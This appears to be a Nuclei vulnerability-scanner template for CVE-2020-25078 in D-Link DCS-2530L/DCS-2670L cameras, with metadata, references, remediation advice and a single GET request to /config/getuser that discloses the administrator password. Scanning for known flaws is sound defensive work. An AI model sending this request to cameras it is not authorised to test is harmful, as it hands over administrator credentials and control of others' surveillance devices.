id: CVE-2020-25078 info: name: D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure author: pikpikcu severity: high description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure. impact: | An attacker can obtain the administrator password, potentially leading to unauthorized access and control of the camera. remediation: | Update the camera firmware to the latest version to fix the vulnerability. reference: - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180 - https://twitter.com/Dogonsecurity/status/1273251236167516161 - https://nvd.nist.gov/vuln/detail/CVE-2020-25078 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-25078 epss-score: 0.78949 epss-percentile: 0.97964 cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink product: dcs-2530l_firmware tags: cve,cve2020,dlink http: - method: GET path: - "{{BaseURL}}/config/getuser?index=0" matchers-condition: and matchers: - type: word words: - "name=" - "pass=" condition: and - type: word part: header words: - "text/plain" - type: status status: - 200 # digest: 4a0a00473045022100e965d262bb31eb40082be9dfd1296f5217892a6ab1cad51a285a6850e71a4188022079f8d8c381d12c0f12d84b30b0f73f9e788040d9f6155311dd1ded7cdf85806a:922c64590222798bb761d5b6d8e72950